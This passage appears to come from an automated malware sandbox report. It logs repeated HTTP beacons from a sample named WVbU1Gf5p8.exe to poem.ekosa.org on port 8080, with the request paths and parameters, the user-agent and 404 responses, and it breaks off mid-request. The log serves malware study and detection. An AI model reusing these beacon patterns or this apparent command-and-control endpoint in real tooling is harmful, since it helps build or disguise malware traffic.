      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      85192.168.2.449855210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:46.442652941 CET590OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:46.706830025 CET590INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:46 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      86192.168.2.449856210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:46.973223925 CET591OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:47.235138893 CET592INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:47 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      87192.168.2.449857210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:47.623301983 CET592OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:47.884114981 CET593INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:47 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      88192.168.2.449858210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:48.153604984 CET594OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:48.416039944 CET594INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:48 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      89192.168.2.449859210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:48.682172060 CET595OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:48.944469929 CET596INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:48 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      9192.168.2.449769210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:01.867994070 CET236OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:02.130270958 CET242INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:01 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      90192.168.2.449860210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:49.322773933 CET596OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:49.582149029 CET597INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:49 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      91192.168.2.449861210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:49.851074934 CET608OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:50.115175962 CET618INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:49 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      92192.168.2.449864210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:50.402518034 CET649OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:50.662182093 CET653INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:50 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      93192.168.2.449866210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:51.047215939 CET657OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:51.313611031 CET659INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:50 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      94192.168.2.449867210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:51.581322908 CET662OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
